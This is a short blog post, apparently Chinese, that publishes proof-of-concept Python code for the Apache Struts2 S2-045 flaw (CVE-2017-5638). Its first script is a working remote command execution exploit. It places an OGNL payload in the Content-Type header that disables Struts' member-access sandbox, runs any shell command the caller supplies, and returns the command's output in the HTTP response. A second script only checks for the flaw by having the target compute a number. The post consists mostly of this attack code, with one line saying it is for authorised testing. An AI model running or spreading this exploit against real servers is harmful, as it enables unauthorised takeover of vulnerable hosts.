struts2 045 poc

struts2 045 poc

作者: zwalts | 来源:发表于2017-06-15 11:32 被阅读0次

    第一篇文章测试用吧

    下面直接是漏洞利用代码（CVE-2017-5638，即 S2-045）：OGNL 表达式放在 Content-Type 请求头里发送，有漏洞的 Struts2 会对其求值，用 ProcessBuilder 执行命令并把输出直接写回 HTTP 响应。只能对已获授权的测试目标使用。

    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    
    try:
        import urllib2
        import httplib
    except ImportError:  # Python 3: same API under the renamed modules
        import urllib.request as urllib2
        import http.client as httplib
    
    
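    def _s2_045_payload(cmd):
        """Return the OGNL expression that makes a vulnerable Struts 2 run *cmd*.

        *cmd* ends up inside an OGNL single-quoted string literal, so backslashes
        and single quotes are escaped first: an unescaped quote breaks the
        expression and the target then executes nothing at all.

        Raises ValueError if *cmd* contains CR/LF, because the expression is
        carried in an HTTP header and a line break would terminate it.
        """
        if "\r" in cmd or "\n" in cmd:
            raise ValueError("cmd must not contain CR or LF")
        literal = cmd.replace("\\", "\\\\").replace("'", "\\'")
        parts = [
            "%{(#_='multipart/form-data').",
            # Swap the sandboxed member-access policy for the permissive default
            # and empty the excluded package/class lists before doing anything.
            "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).",
            "(#_memberAccess?",
            "(#_memberAccess=#dm):",
            "((#container=#context['com.opensymphony.xwork2.ActionContext.container']).",
            "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).",
            "(#ognlUtil.getExcludedPackageNames().clear()).",
            "(#ognlUtil.getExcludedClasses().clear()).",
            "(#context.setMemberAccess(#dm)))).",
            "(#cmd='%s')." % literal,
            # Pick the shell by OS, run the command with stderr merged into
            # stdout, and stream the output straight into the HTTP response.
            "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).",
            "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).",
            "(#p=new java.lang.ProcessBuilder(#cmds)).",
            "(#p.redirectErrorStream(true)).(#process=#p.start()).",
            "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).",
            "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).",
            "(#ros.flush())}",
        ]
        return "".join(parts)


    def exploit(url, cmd, timeout=10):
        """Run *cmd* on a Struts 2 host vulnerable to S2-045; print and return the output.

        The OGNL payload is sent as the Content-Type header of a GET to *url*.
        The target copies the command's stdout/stderr into the HTTP response,
        whose raw body is printed and returned.

        A 4xx/5xx status is not treated as failure: the body of that error
        response still carries the command output, so it is read like a normal
        reply.  A truncated body (IncompleteRead) returns whatever arrived.
        Connection failures and timeouts propagate as urllib2.URLError.

        timeout (seconds) bounds the request so a dead host cannot hang the tool.
        Raises ValueError if *cmd* contains CR/LF.
        """
        headers = {"User-Agent": "Mozilla/5.0", "Content-Type": _s2_045_payload(cmd)}
        request = urllib2.Request(url, headers=headers)
        try:
            response = urllib2.urlopen(request, timeout=timeout)
        except urllib2.HTTPError as err:
            # HTTPError is itself a readable response object; keep its body.
            response = err
        try:
            page = response.read()
        except httplib.IncompleteRead as err:
            page = err.partial
        finally:
            response.close()
        print(page)
        return page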
    
    
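    if __name__ == '__main__':
        # CLI: struts2_S2-045.py <url> <cmd>
        import sys
        if len(sys.argv) != 3:
            print("[*] struts2_S2-045.py <url> <cmd>")
            # Usage error: exit non-zero so shell callers can tell it apart
            # from a successful run.
            sys.exit(2)
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url, cmd = sys.argv[1], sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)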
    

    另外一个只做检测、不执行系统命令的 POC：让目标计算 102*102*102*99，响应里出现结果 105059592 即判定存在漏洞。

    import requests
    import sys
    
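    def poc(url, timeout=10):
        """Return True if *url* looks vulnerable to S2-045 (CVE-2017-5638).

        The OGNL expression in the Content-Type header only asks the target to
        compute 102*102*102*99 and print it into the response; no system
        command is run.  The host is flagged when the product, 105059592,
        appears in the body.

        timeout (seconds) bounds the request so an unresponsive host cannot
        hang a scan.  Network errors propagate as requests exceptions.
        """
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

        headers = {"Content-Type": payload}
        r = requests.get(url, headers=headers, timeout=timeout)
        # r.text (str) rather than r.content (bytes): a str-in-bytes test raises
        # TypeError on Python 3, which would have made every scan error out.
        return "105059592" in r.text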
    
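    if __name__ == '__main__':
        # CLI: s2-045.py <target-url>
        if len(sys.argv) < 2:
            # print() calls work on Python 2 and 3; the bare print statement
            # is a SyntaxError on 3.
            print("python s2-045.py target")
            sys.exit(2)  # usage error, non-zero for shell callers
        if poc(sys.argv[1]):
            print("vulnerable")
        else:
            print("not vulnerable")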
    
